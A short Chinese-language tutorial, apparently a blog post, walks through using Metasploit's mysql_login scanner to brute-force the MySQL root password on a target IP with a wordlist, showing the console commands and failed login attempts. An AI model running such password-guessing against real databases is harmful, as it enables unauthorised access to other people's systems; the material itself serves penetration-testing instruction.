Metasploit扫描Mysql弱口令

msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml  msf连接数据库

[*] Rebuilding the module cache in the background...

msf > db_status   查看数据库连接状态

[*] postgresql connected to msf3


msf > use auxiliary/scanner/mysql/mysql_login   加载扫描模块

msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3   目标IP地址

RHOSTS => 1.5.5.3

msf auxiliary(mysql_login) > set USERNAME root    目标用户名 一般为root

USERNAME => root

msf auxiliary(mysql_login) > set 

 PASS_FILE  /pen/msf3/data/wordlists/postgres_default_pass.txt   密码字典路劲,路劲随意填写


PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt

msf auxiliary(mysql_login) > exploit      开始扫描

[*] 1.5.5.3:3306 MYSQL �C Found remote MySQL version 5.5.16

[*] 1.5.5.3:3306 MYSQL �C [1/7] �C Trying username:’root’ with password:”

[*] 1.5.5.3:3306 MYSQL �C [1/7] �C failed to login as ‘root’ with password ”

[*] 1.5.5.3:3306 MYSQL �C [2/7] �C Trying username:’root’ with password:’root’

[*] 1.5.5.3:3306 MYSQL �C [2/7] �C failed to login as ‘root’ with password ‘root’

[*] 1.5.5.3:3306 MYSQL �C [3/7] �C Trying username:’root’ with password:’tiger’

[*] 1.5.5.3:3306 MYSQL �C [3/7] �C failed to login as ‘root’ with password ‘tiger’

[*] 1.5.5.3:3306 MYSQL �C [4/7] �C Trying username:’root’ with password:’postgres’


能否扫描出来主要看密码字典

你可能感兴趣的:(IP地址,连接数据库,connected)